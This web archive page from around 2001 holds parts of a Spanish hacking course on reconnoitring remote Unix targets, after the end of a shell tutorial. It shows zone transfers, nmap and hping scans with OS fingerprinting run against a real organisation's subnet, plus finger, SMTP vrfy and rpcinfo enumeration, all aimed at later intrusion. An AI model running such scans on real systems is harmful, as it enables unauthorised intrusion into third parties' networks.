Si lo usamos con la opción -a, muestra todo, incluidos los ficheros. Existen otros filtros que se pueden usar con una tubería, uno de los más conocidos es el filtro "sort", que ordena alfabéticamente la entrada estandar. Cuando redireccionamos la "salida estandar" a un fichero, si se produce un error en el programa, el mensaje de error no se imprime en el fichero, si no que se vuelca a la pantalla. Esto es debido a que los mensajes de error se imprimen usando "error estandar", "stderr". Para redireccionar el error estandar.

[genaro]$ cc programa.c -o programa 2>errores.txt

La órden cc, sirve para compilar programas que están escritos en lenguaje "C" y "C++", en el ejemplo, los errores de compilación se enviarán al fichero "errores.txt". Y por último …

[genaro]$ exit

Linux Debian (Potatoe)
Login: genaro
password:
[genaro]$ _

Hoy hemos visto:

- Crear ficheros con contenido.

- Ver ficheros.

- Concepto de entrada estandar, salida estandar y error estandar,

- Redireccionamiento de salida estandar y error estandar.

- Tuberías.

La próxima semana, o sea dentro de pocos días, me extenderé en el tema de los ficheros.

Lokutus, asimilando la red.

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

Curso práctico de hacking (CPH) II

Lecter — Fri, 15 Jun 2001 22:10:49 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: Curso práctico de hacking II
Autor: Lecter
Tema: Acceso a las cosas remotas

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

CURSO PRACTICO DE HACKING–2a entrega

Queridos compañeros (exploradores y novatos con ganas de aprender):

Como os prometi aqui teneis el segundo capitulo del CPH, que espero
que pueda serviros a abrir la brecha del estudio autodidacta con
algunos consejillos y notas. Antes de comenzar con este capitulo
quiero recalcar que el objetivo de este “seminario” de hacking intenta
ilustrar los modos de conseguir introducirnos en una maquina unix cuya
seguridad ha sido comprometida, generalmente por una mala gestion del
administrador, que muchas veces pasa olimpicamente del sistema que
debe cuidar como Cancerbero. En ningun caso he querido arrastrar a
nadie al empleo de este conocimiento para oscuros propositos, sino
para impulsar a los estudiantes novatos a llevar los sistemas a sus
ultimas posibilidades y no como meros usuarios finales.Asi que
=A1abstenerse los lamers!

En este sentido, ha salido este mes en la revista @rroba un excelente
articulo de Carlos Sanchez Almeida titulado “Hackers de plastico” y
aunque corto merece la pena que lo leais. Al igual que a finales de
los setenta se acuñaba el termino “punkies de plastico” para señalar
que debajo de la mascarada de tachuelas y cuero, aquellos punkies eran
tan burgueses como sus papis, los hackers de plastico son aquellos que
se han erigido como arquetipo de la revolucion moderna: el hacker
televisivo, cruce de Neo y el padre Apeles. Pero ya sabeis: con lo de
hacker ocurre lo mismo que con quienes se dicen rosacruz o
sufi…Ciertamente no lo son. Un hacker de verdad “jamas se colocaria
un piercing para aparentar: lo unico que agujerean es el sistema”. El
hacking es un camino duro y dificil, “que implica muchas renuncias. La
primera y la mas importante es la que diferencia verdaderamente al
hacker del lamer: la renuncia al ego…”

Y ahora vamos con nuestro asunto. Antes de entrar de lleno en el
capitulo 2 quiero aclarar algo a los estudiantes del primer capitulo:
Las utilidades whois, traceroute, host, ping y nslookup las debeis
tener en cualquier sistema linux que monteis. Las podeis usar en
consola o en un xterm. Algunas como traceroute hay que usarlas en
ciertas distros linux como root, pero en otras no. Evidentemente antes
habreis de conectaros y si sois novatillos el paquete kppp de KDE
se parece muchisimo al procedimiento de conexion telefonica a redes
del Windoze. Una vez conectados podeis abrir xterms en el escritorio
KDE o pasaros con Alt-Ctrl-Fx a una consola (Volvereis al escritorio
con Alt-Ctrl-F7). Otras utilidades teneis que buscarlas en la
red. Para ello basta con www.altavista.com y www.alltheweb.com que
contiene un buscador FAST FTP y WEB y una dosis minima de ingenio. De
todos modos os dire donde podeis descargar las herramientas:

-fping en www.stanford.edu/~schemers/docs/fping/fping.html
-nmap en www.insecure.org/nmap/
-netcat en www.l0pht.com/~weld/netcat/
-queso en ftp.connect.net/pub/security/trinux/netmap/

Espero que continueis en la brecha

Saludos,

LECTER

CPH. CAPITULO 2. EXTRACCION DE INFORMACION CRITICA DEL OBJETIVO

En este capitulo nos vamos a centrar en la obtencion de informacion
critica que luego podra ser explotada para introducirnos en el
sistema. La informacion critica se basa siempre en algun compromiso en
la seguridad de un servicio, un bug (fallo) de algun comando
relacionado con los servicios, etc. Para este capitulo me he basado en
un libro muy util que acaba de salir al mercado:Hacking
exposed;network security secrets and solutions, de Stuart McClure,
George Kutz y otro mas (ya esta en español).

1)Informacion critica obtenida mediante “transferencia de zona” de
servidores DNS mal configurados.   Algunas veces nos encontramos con
servidores DNS   configurados de   manera insegura y   que pueden
permitirnos entrar en la llamada zona de transferencia de DNS, aun
siendo usuarios de   internet no autorizados. Podemos intentarlo
utilizando la instruccion nslookup en modo interactivo:

$>nslookup

=2E..a continuacion aparecera el servidor DNS por defecto que sera el
de nuestro ISP u organizacion…pero como queremos consultar otro,
X.X.X.X (uno que corresponda a nuestro objetivo, como obtuvimos al
hacer whois transmeta.com) escribiremos

>server X.X.X.X

a lo que respondera aceptandolo como “default”. A continuacion hacemos

>set type=3Dany
>ls -d objetivo.net.>> fichero

Lo que hemos hecho es definir el tipo de registro como cualquiera
(any) con lo que podemos recuperar los registros DNS
disponibles. Luego los listamos y redirigimos a “fichero” para
consultarlo mas adelante. Si ha habido suertecilla, cosa que dudo, al
leer “fichero”, encontrariais diversas entradas con varios registros,
p.ej:

acct22   1D IN A       192.168.230.3
         1D IN HINFO   “Gateway 2000″ “Win WKGRPS”
         1D IN MX      0 acmeadmin-smtp
         ………………………………….

El registro A indica la direccion IP de esta cuenta, HINFO identifica
la plataforma o el sistema operativo y MX nos dice donde se gestiona
el correo. Existen mas registros, pero no los voy a comentar. Esta
informacion es muy valiosa porque nos da de golpe conocimiento del
sistema operativo y gestor de correo (aparte de mucho mas). Existe una
utilidad algo dificililla de encontrar buscando a las bravas por la
red, que nos permite realizar transferencias de zona (cuando se puede)
y transferir de manera recursiva informacion de la zona y archivos
huespedes de cada uno de los dominios consultados. Tal herramienta es
“axfr” que la podeis encontrar en
ftp=2Econnectnet.com/pub/security/trinux/netmap/axfr-0.5.2.tar.gz. Una
vez instalado, hacemos como root

#>axfr objetivo.net
y saldran algunos mensajes
axfr: Using default directory /root/axfrdb
Found X.X.X.X name server for domain ‘objetivo.net’
text deleted
Received xxxx answers

Ya esta. Para consultar la base de datos basta con que hagais

#>axfrcat objetivo.net

Pero como ya he dicho, no sera tan tordo el administrador de dejar mal
configurado el servidor DNS.

2. =BFProtege algun cortafuegos nuestro objetivo?

Vamos unicamente a comprobar si existe algun cortafuegos que proteja
nuestro objetivo. La manera de saltarse el cortafuegos ya la
consideraremos en las tecnicas de ataque, pues ahora estamos
extrayendo informacion critica solamente. Recordando la utilidad
nmap, podemos usarla para descubrir cortafuegos. Cuando nmap explora
un host, no solamente dice si los puertos estan abiertos, sino tambien
si estan “filtrados”. Un puerto filtrado en nmap indica que o bien no
se recibio ningun paquete SYN/ACK o RST/ACK o bien se recibio un
mensaje ICMP de destino inalcanzable con codigo 13 (Cominicacion
prohibida por el administrador). Otra utilidad interesante es hping
(www.kyuzz.org/antirez). Una vez instalada, hacemos como root

#>hping objetivo.com -S -p (n=BA de puerto)

De este modo se envian paquetes TCP SYN al puerto destino y obtenemos
informacion de los paquetes que regresan. Si el flag de respuesta es
SA (SYN/ACK) quiere decir que el puerto destino esta abierto y listo
para recibir conexion. A veces nos sale como respuesta “ICMP
unreachable type 13 from X.X.X.X” lo que nos indica que X.X.X.X es el
cortafuegos del objetivo. No obstante si el resultado de hping no da
respuesta alguna puede ser que o bien el paquete se haya perdido en la
red o que el cortafuegos lo detenga. Si obtenemos una respuesta con
flag RA (RST/ACK) puede ser que el cortafuegos haya rechazado el
paquete o puede que lo haya dejado pasar por el puerto pero que el
host objetivo no esta escuchando. Vamos a intentar ilustrarlo con un
ejemplo. Mi host objetivo es la pagina web del Centro Informatico
Cientifico de Andalucia, www.cica.es. Voy antes que nada a hacer un
traceroute

$>traceroute www.cica.es
�
1 SEVI-X13.red.retevision.es (62.81.56.45) 134.694 ms 139.73 ms 139.866 ms
2 SEVI-R3.red.retevision.es (62.81.56.27) 139.931 ms 120.489 ms SEVI-R1.red.retevision.es (62.81.56.28) 129.317 ms
3 SEVI-R15.red.retevision.es (62.81.55.229) 139.938 ms 129.841 ms 119.956 ms
4 BARC-R16.red.retevision.es (62.81.125.3) 170.034 ms 149.872 ms 149=2E948 ms
5 ReteNAC.red.retevision.es (62.81.63.202) 139.926 ms 169.764 ms 159=2E934 ms
6 EspaNIX.red.retevision.es (62.81.8.146) 179.967 ms 179.872 ms 169.909 ms
7 ibernet.espanix.net (193.149.1.57) 170.042 ms 159.813 ms 149.953 ms
8 194.179.0.113 (194.179.0.113) 179.942 ms 159.778 ms 159.919 ms
9 A0-2-4.EB-Madrid00.red.rediris.es (130.206.224.77) 159.959 ms 199.853 ms 169.892 ms
10 A1-0-1.EB-Sevilla1.red.rediris.es (130.206.224.10) 189.936 ms 189.926 ms 179.875 ms
11 130.206.194.10 (130.206.194.10) 179.931 ms 169.96 ms 169.856 ms
12 argantonio.cica.es (150.214.5.77) 189.97 ms * 180.02 ms

Muy bien, el host 130.206.194.10 parece ser un enrutador o
cortafuegos que dirige el trafico a argantonio.cica.es (www.cica.es).
Ahora voy a utilizar la herramienta nmap para hacer una evaluacion de
la topologia de una subred. Voy a escanear por el puerto 80
silenciosamente todas las maquinas de la subred C a la que pertenece
www.cica.es:

#>nmap -sS -p80 www.cica.es

# Nmap (V. nmap) scan initiated 2.53 as: nmap -sS -p80 -o cica www.cica.es/24
The 1 scanned port on (150.214.5.0) is: closed
The 1 scanned port on (150.214.5.1) is: closed
Interesting ports on www.ceseand.cica.es (150.214.5.2):
Port State Service
80/tcp open http

Interesting ports on scsasnt.sas.cica.es (150.214.5.3):
Port State Service
80/tcp open http

Interesting ports on prometeo.cica.es (150.214.5.4):
Port State Service
80/tcp open http

Interesting ports on cdaea.cica.es (150.214.5.6):
Port State Service
80/tcp open http

Interesting ports on caf.cica.es (150.214.5.7):
Port State Service
80/tcp open http

Interesting ports on microbio.cica.es (150.214.5.8):
Port State Service
80/tcp open http

Interesting ports on www.csalud.junta-andalucia.es (150.214.5.9):
Port State Service
80/tcp open http

Interesting ports on thales.cica.es (150.214.5.10):
Port State Service
80/tcp open http

The 1 scanned port on mileto.cica.es (150.214.5.11) is: closed
Interesting ports on www.tresculturas.org (150.214.5.12):
Port State Service
80/tcp open http

Interesting ports on cdma.cica.es (150.214.5.13):
Port State Service
80/tcp open http

Host   (150.214.5.31) seems to be a subnet broadcast address (returned 1 extra pings). Still scanning it due to positive ping response from its own IP.
The 1 scanned port on (150.214.5.31) is: closed
Host   (150.214.5.48) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
The 1 scanned port on osni.cica.es (150.214.5.49) is: closed
The 1 scanned port on io.cica.es (150.214.5.50) is: closed
The 1 scanned port on iat-gw.cica.es (150.214.5.51) is: closed
Host   (150.214.5.55) seems to be a subnet broadcast address (returned 1 extra pings). Still scanning it due to positive ping response from its own IP.
The 1 scanned port on (150.214.5.55) is: closed
Host   (150.214.5.64) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
The 1 scanned port on (150.214.5.65) is: closed
The 1 scanned port on winbdd.cica.es (150.214.5.66) is: closed
The 1 scanned port on mercurio.cica.es (150.214.5.67) is: closed
The 1 scanned port on winbdd2.cica.es (150.214.5.68) is: closed
Interesting ports on orgiva.cica.es (150.214.5.69):
Port       State       Service
80/tcp     open        http

The 1 scanned port on cache.cica.es (150.214.5.70) is: closed
The 1 scanned port on ntp.cica.es (150.214.5.71) is: closed
Interesting ports on patro.cica.es (150.214.5.72):
Port State Service
80/tcp open http

The 1 scanned port on horacio.cica.es (150.214.5.73) is: closed
Interesting ports on argantonio.cica.es (150.214.5.77):
Port State Service
80/tcp open http

Interesting ports on ligustino.cica.es (150.214.5.78):
Port State Service
80/tcp open http

Interesting ports on listas.cica.es (150.214.5.79):
Port State Service
80/tcp open http

The 1 scanned port on idefix.cica.es (150.214.5.85) is: closed
The 1 scanned port on lejia-s.cica.es (150.214.5.126) is: closed
Host (150.214.5.127) seems to be a subnet broadcast address (returned 1 extra pings). Still scanning it due to positive ping response from its own IP.
The 1 scanned port on (150.214.5.127) is: closed
# Nmap run completed at Mon Aug 7 00:56:51 2000 — 256 IP addresses (33 hosts up) scanned in 31 seconds

Bueno, bueno…ahora si hago un traceroute a cada uno de los hosts que
han sido escaneados, obtengo que en todos los casos, el host
130.206.194.10 les apunta, con lo cual podemos asegurar que se trata
de un router/firewall frontera.
�
Voy a escanear www.cica.es con nmap pero a todos los puertos:

# Nmap (V. nmap) scan initiated 2.53 as: nmap -vv -sS -O -P0 www.cica.es
Interesting ports on argantonio.cica.es (150.214.5.77):
(The 1508 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp                   �
22/tcp     open        ssh                   �
23/tcp     open        telnet                �
80/tcp     open        http                  �
119/tcp    filtered    nntp                  �
123/tcp    filtered    ntp                   �
389/tcp    open        ldap                  �
390/tcp    open        uis                   �
443/tcp    open        https                 �
512/tcp    open        exec                  �
513/tcp    open        login                 �
514/tcp    open        shell                 �
515/tcp    open        printer               �
3128/tcp   open        squid-http            �
8888/tcp   open        sun-answerbook

TCP Sequence Prediction: Class=3Drandom positive increments
Difficulty=3D88217 (Worthy challenge)

Sequence numbers: C71B5D1D C71EA319 C7205F3B C721CEFD C72706F0 C729B3AC
Remote OS guesses: Solaris 2.6 – 2.7, Solaris 7
OS Fingerprint:
TSeq(Class=3DRI%gcd=3D1%SI=3D15899)
T1(Resp=3DY%DF=3DY%W=3D2297%ACK=3DS++%Flags=3DAS%Ops=3DNNTNWME)
T2(Resp=3DN)
T3(Resp=3DN)
T4(Resp=3DY%DF=3DY%W=3D0%ACK=3DO%Flags=3DR%Ops=3D)
T5(Resp=3DY%DF=3DY%W=3D0%ACK=3DS++%Flags=3DAR%Ops=3D)
T6(Resp=3DY%DF=3DY%W=3D0%ACK=3DO%Flags=3DR%Ops=3D)
T7(Resp=3DY%DF=3DY%W=3D0%ACK=3DS%Flags=3DAR%Ops=3D)
PU(Resp=3DY%DF=3DY%TOS=3D0%IPLEN=3D70%RIPTL=3D148%RID=3DE%RIPCK=3DE%UCK=3DE%ULEN=3D134%DAT=3DE)
# Nmap run completed at Sun Aug 6 20:02:23 2000 — 1 IP address (1 host up) scanned in 34 seconds

Se trata de un Solaris 2.6-2.7 que tiene filtrados los puertos de
usenet (119) y network time protocol (123). Luego a no ser que este
mismo host utilice un filtro de paquetes, sospecharemos que son
filtrados por las reglas del firewall/router que le precedia en la
secuencia de traceroute.

Si barremos ahora los puertos del supuesto firewall:

�
# Nmap (V. nmap) scan initiated 2.53 as: nmap -vv -sS -O -P0 -o cica 130.206.194.10
Interesting ports on (130.206.194.10):
(The 1517 ports scanned but not shown below are in state: closed)
Port       State       Service
79/tcp     open        finger                �
119/tcp    filtered    nntp                  �
123/tcp    filtered    ntp                   �
1998/tcp   open        x25-svc-port          �
2001/tcp   open        dc                    �
6001/tcp   open        X11:1

TCP Sequence Prediction: Class=3Drandom positive increments
Difficulty=3D38400 (Worthy challenge)

Sequence numbers: 2395ACF2 23A031DB 23AB5C89 23B4BE60 23BF584E 23C98A6A
Remote OS guesses: AS5200, Cisco 2501/5260/5300 terminal server IOS 11.3.6(T1), Cisco IOS 11.3 – 12.0(9)
OS Fingerprint:
TSeq(Class=3DRI%gcd=3D1%SI=3D9600)
T1(Resp=3DY%DF=3DN%W=3D1020%ACK=3DS++%Flags=3DAS%Ops=3DM)
T2(Resp=3DY%DF=3DN%W=3D0%ACK=3DS%Flags=3DAR%Ops=3D)
T3(Resp=3DY%DF=3DN%W=3D1020%ACK=3DS++%Flags=3DAS%Ops=3DM)
T4(Resp=3DY%DF=3DN%W=3D0%ACK=3DO%Flags=3DR%Ops=3D)
T5(Resp=3DY%DF=3DN%W=3D0%ACK=3DS++%Flags=3DAR%Ops=3D)
T6(Resp=3DY%DF=3DN%W=3D0%ACK=3DO%Flags=3DR%Ops=3D)
T7(Resp=3DY%DF=3DN%W=3D0%ACK=3DS%Flags=3DAR%Ops=3D)
PU(Resp=3DN)
# Nmap run completed at Sun Aug 6 19:40:12 2000 — 1 IP address (1 host up) scanned in 26 seconds

Vemos que se trata efectivamente de un Cisco Terminal Router IOS
11.3-12.0 y que filtra tambien esos dos puertos.
�
Si hacemos un fping a www.cica.es

#>hping www.cica.es -S -p 80
ppp0 default routing interface selected (according to /proc)
HPING www.cica.es (ppp0 150.214.5.77): S set, 40 headers + 0 data bytes
44 bytes from 150.214.5.77: flags=3DSA seq=3D0 ttl=3D243 id=3D4427 win=3D9112 rtt=3D188.4 ms
44 bytes from 150.214.5.77: flags=3DSA seq=3D1 ttl=3D243 id=3D4428 win=3D9112 rtt=3D200.2 ms
44 bytes from 150.214.5.77: flags=3DSA seq=3D2 ttl=3D243 id=3D4429 win=3D9112 rtt=3D210.2 ms
44 bytes from 150.214.5.77: flags=3DSA seq=3D3 ttl=3D243 id=3D4430 win=3D9112 rtt=3D200.2 ms
44 bytes from 150.214.5.77: flags=3DSA seq=3D4 ttl=3D243 id=3D4431 win=3D9112 rtt=3D190.2 ms
44 bytes from 150.214.5.77: flags=3DSA seq=3D5 ttl=3D243 id=3D4432 win=3D9112 rtt=3D210.1 ms

Paramos con Ctrl-C

— www.cica.es hping statistic —
6 packets tramitted, 6 packets received, 0% packet loss
round-trip min/avg/max =3D 188.4/199.9/210.2 ms
�
y observamos que el flag=3DSA indica que el puerto 80 esta
efectivamente abierto. Pero si hacemos hping al puerto 119

#>hping www.cica.es -S -p 119
ppp0 default routing interface selected (according to /proc)
HPING www.cica.es (ppp0 150.214.5.77): S set, 40 headers + 0 data bytes

— www.cica.es hping statistic —
13 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max =3D 0.0/0.0/0.0 ms

Efectivamente, esta vez no tenemos ninguna respuesta y debemos pensar
que el cortafuegos/o enrutador (Cisco ultimate server) la detuvo. =BFO
tal vez el propio host tenia filtro de paquetes?. Si utilizamos de
nuevo nmap y escaneamos toda la subred en los puertos 119 y123:

#>nmap -sS -p119,123 www.cica.es/24

obtenemos en todos los casos que los hosts tienen esos dos puertos
filtrados: Mucha casualidad va a ser que cada host utilice un sistema
de filtrado en dichos puertos . Lo mas aplastante es que el host
130.206.194.10 disponga unas rglas de firewall que filtren dichos
puertos a todos los hosts a los que apunta.

De las cuestiones acerca de los tipos de cortafuegos y las tecnicas
para traspasarlos nos dedicaremos en el capitulo destinado al ataque,
como ya dije antes.

La exploracion de los puertos de un cortafuegos es util, pero la
mayoria no escuchan en puertos predeterminados. La identificacion de
algunos cortafuegos puede hacerse si tenemos suerte de modo muy
sencillo leyendo ciertos mensajes de identificacion que muchos de
ellos presentan. Con la utilidad netcat podemos conectarnos al puerto
21 del posible cortafuegos

#>nc -v -n 192.168.51.129 21
(UNKNOWN) [192.168.51.129] 21 (?) open
220 Secure Gateway FTP server ready

#>nc -v -n 192.168.51.129 23
(UNKNOWN) [192.168.51.129] 23 (?) open
Eagle Secure Gateway
Hostname:
3. Exportacion de archivos NFS

El Network File System (NFS) es un sistema de red que posibilita que
un host servidor proporcione sistemas de archivos y dispositivos
perifericos a maquinas clientes. Si el amigo administrador no es un
lumbrera o pasa cantidad, puede que no haya configurado el servidor
NFS adecuadamente…y cualquier usuario remoto puede tener acceso de
lectura y escritura. Si mediante una exploracion previa se observa que
el puerto 2049 (servidor nfs) de un host esta abierto, con la utilidad
showmount -e podemos conseguir la lista de exportacion de un servidor
NFS. Si hacemos como root

#>showmount -e objetivo.net
y nos sale algo como
RPC: Port mapper failure – RPC: Unable to receive
pues nada, no ha habido suerte

pero si nos saliera

#>showmount -e objetivo2.net
export list for objetivo2.net
/pub (everyone)
/home (everyone)

ya podiamos establecer una via de entrada con ayuda de los rlogin
(ya lo veremos en el hacking).

4. Listado de usuarios y grupos

Parece mentira, pero algunos administradores emplean la utilidad
finger con m=EDnimas medidas de seguridad…y esto permite obtener
bastante informacion en muchos casos para ingenieria social, que
aunque yo no lo considero como una tecnica pura de hacking, te puede
resolver el problema . Supongamos que el host objetivo esta
ejecutando el servicio fingerd (puerto 79). Si hacemos como root

#>finger -l @host.objetivo
[host.objetivo]
login:root name:root
Directory:/root Shell:/bin/bash
On since Sun Mar 20: 10:15(PST) on tty1. 11 minutes idle
(message off)
On since Sun Mar 20: 10:15(PST) on ttyp0 from :0.0. 3 minute 15 seconds idle
No mail
Plan:
Luke Skywalker
Linux Guru
Telnet password is Lord … (my father)

Peaso de info (pero, como las peliculas de los intocables, el parecido
con la realidad es pura coincidencia) La informacion proporcionada por
finger en principio deberia ser inocua porque la extrae de los campos
de /etc/passwd. Lo mas peligroso es que indica el nombre de los
usuarios conectados y sus tiempos de inactividad. Moreover, cualquier
usuario que tenga un archivo .plan o .project en su directorio
particular, la presentara al hacer finger un merodeador. Los comandos
rwho y rusers muestran los usuarios conectados al host remoto, pero no
dan tanta informacion como finger. Es posible mediante el servicio
smtp localizar usuarios con los mandatos vrfy (confirmacion de
usuarios validos) y expn (direcciones reales de entrega de correo y
alias):

$>telnet 192.168.202.34 25
=2E…………………….
220 mail.bigcorp.com ESMTP Sendmail 8.8.7
vrfy root
250 root <root@bigcorp.com>
expn adm
250 adm <adm@bigcorp.com>

5. Aplicaciones RPC

Remote Procedure Call (RPC)tiene que ver con interacciones entre
procesos=2E El concepto de RPC es una sencilla t=E9cnica para
desarrollar aplicaciones donde se requiere la comunicaci=F3n entre
procesadores que cooperan en un sistema distribuido.

El mecanismo RPC proporciona un servicio para el programador de
apliciones que le permite el uso transparente de un servidor para
proporcionar alguna actividad por parte de la aplicaci=F3n. Esto
efectivamente puede ser utilizado para interactuar con un servidor
computacional o con una Base de Datos, y ha sido usado por algunos
sistemas para proporcionar acceso a servicios del sistema operativo.
El ultimo uso conocido es en sistemas basados en micro-ordenadores,
que da un mejor resultado que en los sistemas tradicionales
encontrados en la mayoria de sistemas unix. La orden rpcinfo es el
equivalente a finger en la enumeracion de aplicaciones RPC que estan a
la escucha en hosts remotos en los puertos 111 (rpcbind) o 32771 (Sun)
Supongamos que nuestro objetivo o una maquina de su subred tiene
activo el puerto 111. Si hacemos

#>rpcinfo -p objetivo.net
y obtenemos:

program   vers     proto     port
100000             2         tcp   111 rpcbind
100002             3         udp   712 rusersd
100011             2         udp   754 rquotad
100005             1         udp   635 mountd
100003             2         udp 2049 nfs
100004             2         tcp   778 ypserv

Esta informacion (me salto lo que ahora puede ser superfluo) indica
que se estan ejecutando rusersd, nfs e ypserv que es el servidor de
NIS. NIS (Network Information System) es un protocolo de nivel de
aplicacion muy util para la gestion de configuraciones
cliente/servidor en sistemas unix. Es un sistema de bases de datos
distribuidas que permiten de manera uniforme el almacenamiento y la
recuperacion de los recursos de red. Como explica Daemond, en lugar de
gestionar archivos como el /etc/hosts, /etc/passwd, /etc/group
independientemente en cada maquina de la red, esto permite que
solamente haya una base de datos compartida (mapas) por el resto de
las maquinas clientes en un servidor central. Esto tiene su aquel para
el hacking de sistemas usando ypcat, pero ya lo veremos.

Existen muchos mas modos de extraer informacion, por ejemplo leyendo
el codigo de las paginas web, estableciendo posibles relaciones de
confianza (trusted hosts con rlogin), ingenieria social, quinta
columna… pero creo que no esta mal para comenzar.

Aqui termina la segunda entrega.

En la proxima nos centraremos en las tecnicas de hacking e
introduccion de sistemas mediante fallos de seguridad, desbordamientos
del bufer de ciertos programas, ataques por fuerza bruta, etc. Queda
todavia un largo camino y luego hay tecnicas avanzadas (tunneling
firewalls, hijacking, IP spoofing…)

Tened cuidado ahi fuera .

LECTER

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

Curso práctico de hacking (CPH) I

Lecter — Fri, 15 Jun 2001 22:09:33 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: Curso práctico de hacking I
Autor: Lecter
Tema: Acceso a las cosas remotas

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

CURSO PRACTICO DE HACKING

Despues de muchas consideraciones acerca de la utilidad de un
protocursillo sobre “hacking” he decidido ofrecerlo a los estudiosos y
serios seguidores de es.comp.hackers. Estos capitulos que entregare
durante las siguientes semanas tienen por objeto servir de ayuda a los
que estan empezando en el mundillo del hacking con sanas intenciones y
no para quedarse en lamers o chicos del script (script kiddies) que lo
que hacen es destrozar con armas hechas por otros y que en el fondo ni
comprenden profundamente.

Ruego encarecidamente a los demas miembros del HACKINDEX, como mi
amigo NBK, Seldon, Lokutus, Isocrono, Crino, etc… que lo usen como
borrador para mejorarlo (si es que quieren tomarse la molestia) e
incluirlo en alguna pagina web destinada a ello. El texto sera llano y
sin tildes para evitar problemas de lectura y esta escrito con el
editor vi. El cursillo (Curso Practico de Hacking o CPH) pretende ser
por entregas dedicadas a cada uno de los pasos fundamentales en el
hacking de una maquina objetivo remota. Cuando me refiero a hacking no
quiere eso decir que me considere yo un hacker ni guru ni ninguna
gaita de esas, sino que es para aproximarme claramente al tema de la
introduccion en sistemas de comprometida seguridad. Hare referencia
fundamentalmente al mundo UNIX y las herramientas seran tambien
programas de aromas unix, scripts en perl o codigo en C. Yo recomiendo
encarecidamente que os aprovisioneis de un sistema Linux para estos
menesteres, ya que la mayoria de las utilidades de red vienen
incluidas, disponemos de un excelente compilador de C, del lenguaje
perl, Tcl, python… asi como de la posibilidad de instalar muchos
paquetes escritos para unix/linux como Saint, nmap, Nessus…y un
largo etcetera de ventajas con respecto a Mac o al Windoze.

El estudiante novato debera leer antes que nada la FAQ del grupo, que
puede encontrarla en la pagina de isocrono
(http://www.navegalia.com/hosting/00084/isocrono) tanto la del 98 y 99
como la ultima del 2000. Y hacer hincapie en el “decalogo del
hacker”. Hay que aprender por puro deleite, no para destrozar
sistemas. En fin, he intentado ajustarme a lo que yo pienso que son
los pasos fundamentales en el hacking de sistemas unix:

1. Merodeo y rastreo del objetivo

2. Extraccion de informacion critica del objetivo

3. Introduccion en el sistema

4. Aumento de privilegios (acceso a root, si la introduccion no
conduce directamente a el)

5. Maniobras oscuras (evitando ser notados, instalando sniffers,
dejando puertas traseras y troyanos)

6. Eliminando huellas

Aqui va el primer capitulo.

Saludos a todos,

LECTER

CPH. CAPITULO 1. MERODEO Y RASTREO DEL OBJETIVO

Un explorador no explora a tontas y locas…sabe bien cual es su
objetivo=2E Por lo tanto, lo que evidentemente hemos de subrayar como
fundamental es la informacion que tenemos del sistema objetivo. Puede
ser que conozcamos su nombre de dominio, su IP, y muchos datos mas,
pero puede ser que para comenzar tengamos algo asi como poco menos que
el nombre de la organizacion o la entidad “organizacion
objetivo”. Afortunadamente desde nuestra maquina linux podemos usar la
utilidad whois que permitira hacer consultas en la base de datos
InterNIC, simplemente haciendo

$>whois “organizacion objetivo”

y de este modo podremos ver muchos dominios diferentes asociados a tal
entidad. No obstante los servidores de InterNIC truncan los resultados
a 50 items, con lo que puede convenirnos consultar en
http://www.websitez.com, que proporciona todos los registros asociados
con la entidad buscada. Una vez conseguido el listadopodemos consultar
los dominios relacionados (p.ej. objetivo.net) mediante

$>whois objetivo.net

El resultado nos proporciona:
-Domain Name
-Registrar
-Whois server
-Referral ULR
-Name Servers
-Update Date

De este modo conseguimos informacion vinculada el objetivo y los
servidores DNS. Ademas tambien la fecha de actualizacion nos informa
de la precision de la informacion contenida en el objetivo. Si hace
mucho tiempo que no se actualiza, podria estar obsoleta. Pero, una
vez hemos consultado las bases de datos sobre los dominios es menester
hacer lo propio sobre redes para comprobar si hay alguna red real
asociada al dominio objetivo. Para ello podemos usar la base de datos
de ARIN. Para ello haremos

$>whois X.X.X.X@whois.arin.net

donde X.X.X.X es la IP de algun servidor DNS de los ya
vistos. Revisando los datos podemos saber quien es el proveedor
principal de la red central y la clase de red (ya que nos proporciona
el intervalo de IPs) a que nuestro objetivo esta asociado.

Por ejemplo, supongamos que estoy interesado en la empresa transmeta
(donde trabaja Linus Benedict Torvalds) pero no se nada mas.

$>whois “transmeta”

[rs.internic.net]

Whois Server Version 1.1

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to
http://www.internic.net for detailed information.

TRANSMETA.ORG
TRANSMETA.NET
TRANSMETA.COM

To single out one record, look it up with “xxx”, where xxx is one of
the of the records displayed above. If the records are the same, look
them up with “=3Dxxx” to receive a full display for each record.

>>> Last update of whois database: Tue, 1 Aug 00 04:13:33 EDT <<<

The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
Registrars.

Con esto me pongo a probar. Supongamos que me da por empezar por
transmeta.com

$>whois transmeta.com

[rs.internic.net]

Whois Server Version 1.1

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to
http://www.internic.net for detailed information.

Domain Name: TRANSMETA.COM
Registrar: NETWORK SOLUTIONS, INC.
Whois Server: whois.networksolutions.com
Referral URL: www.networksolutions.com
Name Server: NS1.TRANSMETA.COM
Name Server: NS2.TRANSMETA.COM
Updated Date: 06-jan-2000

>>> Last update of whois database: Tue, 1 Aug 00 04:13:33 EDT <<<

The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
Registrars.

Bueno…no se actualiza desde enero de 2000, pero me interesa. Voy a
utilizar la utilidad nslookup para conseguir las IPs de transmeta.com
y los dos DNS servers De este modo consigo

Name: transmeta.com
Addresses: 209.10.41.231, 209.10.41.232 (puede ser una pagina web y su espejo o gemelo)
Name: ns1.transmeta.com
Address: 209.10.41.227
Name: ns2.transmeta.com
Address: 209.10.217.68

Ahora voy a buscar si existe una red global que contenga el objetivo:

$>whois 209.10.41.227@whois.arin.net

[whois.arin.net]
Globix Corporation (NETBLK-GLOBIXBLK3)
